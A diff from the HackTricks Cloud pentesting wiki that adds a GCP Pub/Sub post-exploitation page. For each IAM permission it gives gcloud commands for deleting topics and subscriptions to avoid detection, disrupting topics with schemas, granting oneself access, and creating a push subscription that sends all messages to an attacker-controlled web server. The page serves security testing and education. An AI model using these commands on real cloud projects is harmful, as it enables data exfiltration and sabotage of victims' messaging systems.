GITBOOK-530: change request with no subject merged in GitBook

SUMMARY.md

@@ -78,6 +78,7 @@
     * [GCP - Cloud Run Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-run-post-exploitation.md)
     * [GCP - IAM Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-iam-post-exploitation.md)
     * [GCP - KMS Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-kms-post-exploitation.md)
+    * [GCP - Pub/Sub Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-pub-sub-post-exploitation.md)
     * [GCP - Secretmanager Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-secretmanager-post-exploitation.md)
     * [GCP - Storage Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-storage-post-exploitation.md)
   * [GCP - Privilege Escalation](pentesting-cloud/gcp-security/gcp-privilege-escalation/README.md)
@@ -133,7 +134,7 @@
     * [GCP - Filestore Enum](pentesting-cloud/gcp-security/gcp-services/gcp-filestore-enum.md)
     * [GCP - IAM, Principals & Org Policies Enum](pentesting-cloud/gcp-security/gcp-services/gcp-iam-and-org-policies-enum.md)
     * [GCP - KMS Enum](pentesting-cloud/gcp-security/gcp-services/gcp-kms-enum.md)
-    * [GCP - Pub/Sub](pentesting-cloud/gcp-security/gcp-services/gcp-pub-sub.md)
+    * [GCP - Pub/Sub Enum](pentesting-cloud/gcp-security/gcp-services/gcp-pub-sub.md)
     * [GCP - Secrets Manager Enum](pentesting-cloud/gcp-pentesting/gcp-services/gcp-secrets-manager-enum.md)
     * [GCP - Source Repositories Enum](pentesting-cloud/gcp-security/gcp-services/gcp-source-repositories-enum.md)
     * [GCP - Stackdriver Enum](pentesting-cloud/gcp-security/gcp-services/gcp-stackdriver-enum.md)

pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-pub-sub-post-exploitation.md

@@ -0,0 +1,164 @@
+# GCP - Pub/Sub Post Exploitation
+
+<details>
+
+<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
+
+Other ways to support HackTricks:
+
+* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
+* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+
+## Pub/Sub
+
+For more information about Pub/Sub check the following page:
+
+{% content-ref url="../gcp-services/gcp-pub-sub.md" %}
+[gcp-pub-sub.md](../gcp-services/gcp-pub-sub.md)
+{% endcontent-ref %}
+
+### `pubsub.topics.publish`
+
+Publish a message in a topic, useful to **send unexpected data** and trigger unexpected functionalities or exploit vulnerabilities:
+
+```bash
+# Publish a message in a topic
+gcloud pubsub topics publish <topic_name> --message "Hello!"
+```
+
+### `pubsub.topics.detachSubscription`
+
+Useful to prevent a subscription from receiving messages, maybe to avoid detection.
+
+```bash
+gcloud pubsub topics detach-subscription <FULL SUBSCRIPTION NAME>
+```
+
+### `pubsub.topics.delete`
+
+Useful to prevent a subscription from receiving messages, maybe to avoid detection.\
+It's possible to delete a topic even with subscriptions attached to it.
+
+```bash
+gcloud pubsub topics delete <TOPIC NAME>
+```
+
+### `pubsub.topics.update`
+
+Use this permission to update some setting of the topic to disrupt it, like `--clear-schema-settings`, `--message-retention-duration`, `--message-storage-policy-allowed-regions`, `--schema`, `--schema-project`, `--topic-encryption-key`...
+
+### `pubsub.topics.setIamPolicy`
+
+Give yourself permission to perform any of the previous attacks.
+
+### **pubsub.subscriptions.create`,`**`pubsub.topics.attachSubscription` , (`pubsub.subscriptions.consume`)
+
+Get all the messages in a web server:
+
+{% code overflow="wrap" %}
+```bash
+# Crete push subscription and recieve all the messages instantly in your web server
+gcloud pubsub subscriptions create <subscription name> --topic <topic name> --push-endpoint https://<URL to push to>
+```
+{% endcode %}
+
+Create a subscription and use it to **pull messages**:
+
+```bash
+# This will retrive a non ACKed message (and won't ACK it)
+gcloud pubsub subscriptions create <subscription name> --topic <topic_name>
+
+# You also need pubsub.subscriptions.consume for this
+gcloud pubsub subscriptions pull <FULL SUBSCRIPTION NAME>
+## This command will wait for a message to be posted
+```
+
+### `pubsub.subscriptions.delete`
+
+**Delete a subscription** could be useful to disrupt a log processing system or something similar:
+
+```bash
+gcloud pubsub subscriptions delete <FULL SUBSCRIPTION NAME>
+```
+
+### &#x20;`pubsub.subscriptions.update`
+
+Use this permission to update some setting so messages are stored in a place you can access (URL, Big Query table, Bucket) or just to disrupt it.
+
+### `pubsub.subscriptions.setIamPolicy`
+
+Give yourself the permissions needed to perform any of the previously commented attacks.
+
+### `pubsub.schemas.delete`
+
+Delete a schema to be able to send messages that doesn't fulfil with the schema:
+
+```bash
+gcloud pubsub schemas delete <SCHEMA NAME>
+```
+
+### `pubsub.schemas.attach`, `pubsub.topics.update`,(`pubsub.schemas.create`)
+
+Attack a schema to a topic so the messages doesn't fulfil it and therefore the topic is disrupted.\
+If there aren't any schemas you might need to create one.
+
+{% code title="schema.json" %}
+```json
+{
+    "namespace": "com.example",
+    "type": "record",
+    "name": "Person",
+    "fields": [
+        {
+            "name": "name",
+            "type": "string"
+        },
+        {
+            "name": "age",
+            "type": "int"
+        }
+    ]
+}
+```
+{% endcode %}
+
+```bash
+# Attach new schema
+gcloud pubsub topics update projects/<project-name>/topics/<topic-id> \
+    --schema=projects/<project-name>/schemas/<topic-id> \
+    --message-encoding=json
+```
+
+### `pubsub.schemas.setIamPolicy`
+
+Give yourself the permissions needed to perform any of the previously commented attacks.
+
+### `pubsub.snapshots.create`,  `pubsub.snapshots.seek`
+
+This is will create a snapshot of all the unACKed messages and put them back to the subscription. Not very useful for an attacker but here it's:
+
+```bash
+gcloud pubsub snapshots create YOUR_SNAPSHOT_NAME \
+    --subscription=YOUR_SUBSCRIPTION_NAME
+gcloud pubsub subscriptions seek YOUR_SUBSCRIPTION_NAME \
+    --snapshot=YOUR_SNAPSHOT_NAME
+```
+
+<details>
+
+<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
+
+Other ways to support HackTricks:
+
+* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
+* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>

pentesting-cloud/gcp-security/gcp-services/gcp-pub-sub.md

@@ -1,4 +1,4 @@
-# GCP - Pub/Sub
+# GCP - Pub/Sub Enum
 
 <details>
 
@@ -18,21 +18,25 @@ Other ways to support HackTricks:
 
 Google [**Cloud Pub/Sub**](https://cloud.google.com/pubsub/) is a service that allows independent applications to **send messages** back and forth. Basically, there are **topics** where applications may **subscribe** to send and receive **messages** (which are composed by the message content and some metadata).
 
-The **topic is the queue** where messages are going to be sent, while the **subscriptions** are the **objects** users are going to use to **access messages in the topics**. There can be more than **1 subscription per topic** and there are 3 types of subscriptions:
+The **topic is the queue** where messages are going to be sent, while the **subscriptions** are the **objects** users are going to use to **access messages in the topics**. There can be more than **1 subscription per topic** and there are 4 types of subscriptions:
 
 * **Pull**: The user(s) of this subscription needs to pull for messages.
 * **Push**: An URL endpoint is indicated and messages will be sent immediately to it.
 * **Big query table**: Like push but setting the messages inside a Big query table.
+* **Cloud Storage**: Deliver messages directly to an existing bucket.
 
-By **default**, a message is **retained for 7 days**, but this time can be **increased up to 31 days**. Also, if it's not **ACKed in 10s** it goes back to the queue.
+By **default** a **subscription expires after 31 days**, although it can be set to never expire.
+
+By **default**, a message is **retained for 7 days**, but this time can be **increased up to 31 days**. Also, if it's not **ACKed in 10s** it goes back to the queue. It can also be set that ACKed messages should continue to be stored.
 
 A topic is by default encrypted using a **Google managed encryption key**. But a **CMEK** (Customer Managed Encryption Key) from KMS can also be selected.
 
 **Dead letter**: Subscriptions may configure a **maximum number of delivery attempts**. When a message cannot be delivered, it is **republished to the specified dead letter topic**.
 
-### Backups & Schemas
+### Snapshots & Schemas
 
-Topics might have **backups** and you could be able to find more **old sensitive information in there**. Backups maintain the **unACKed** msgs of the moment it's taken & the messages after it (and by default they live for a week).
+A snapshot is a feature that **captures the state of a subscription at a specific point in time**. It is essentially a consistent **backup of the unacknowledged messages in a subscription**. By creating a snapshot, you preserve the message acknowledgment state of the subscription, allowing you to resume message consumption from the point the snapshot was taken, even after the original messages would have been otherwise deleted.\
+If you are very lucky a snapshot could contain **old sensitive information** from when the snapshot was taken.
 
 When creating a topic, you can indicate that the **topic messages must follow a schema**.
 
@@ -52,7 +56,8 @@ gcloud pubsub subscriptions get-iam-policy <subscription>
 
 # Get list of schemas
 gcloud pubsub schemas list
-gcloud pubsub schemas describe <snapshot>
+gcloud pubsub schemas describe <schema>
+gcloud pubsub schemas list-revisions <schema>
 
 # Get list of snapshots
 gcloud pubsub snapshots list
@@ -61,27 +66,17 @@ gcloud pubsub snapshots describe <snapshot>
 
 However, you may have better results [**asking for a larger set of data**](https://cloud.google.com/pubsub/docs/replay-overview), including older messages. This has some prerequisites and could impact applications, so make sure you really know what you're doing.
 
-### Post Exploitation
-
-{% code overflow="wrap" %}
-```bash
-# Publish a message in a topic
-gcloud pubsub topics publish <topic_name> --message "Hello!"
+### Privilege Escalation & Post Exploitation
 
-# This will retrive a non ACKed message (and won't ACK it)
-gcloud pubsub subscriptions create my_subscription --topic <topic_name>
-gcloud pubsub subscriptions pull <FULL SUBSCRIPTION NAME>
-
-# Crete push subscription and recieve all the messages instantly in your web server
-gcloud pubsub subscriptions create <subscription name> --topic <topic name> --push-endpoint <URL to push to>
-```
-{% endcode %}
+{% content-ref url="../gcp-post-exploitation/gcp-pub-sub-post-exploitation.md" %}
+[gcp-pub-sub-post-exploitation.md](../gcp-post-exploitation/gcp-pub-sub-post-exploitation.md)
+{% endcontent-ref %}
 
 ## Pub/Sub Lite
 
 [**Pub/Sub Lite**](https://cloud.google.com/pubsub/docs/choosing-pubsub-or-lite) is a messaging service with **zonal storage**. Pub/Sub Lite **costs a fraction** of Pub/Sub and is meant for **high volume streaming** (up to 10 million messages per second) pipelines and event-driven system where low cost is the primary consideration.
 
-In PubSub Lite there **are** **topics** and **subscriptions**, there **aren't backups** and **schemas** and there are:
+In PubSub Lite there **are** **topics** and **subscriptions**, there **aren't snapshots** and **schemas** and there are:
 
 * **Reservations**: Pub/Sub Lite Reservations is a feature that allows users to reserve capacity in a specific region for their message streams.
 * **Operations**: Refers to the actions and tasks involved in managing and administering Pub/Sub Lite.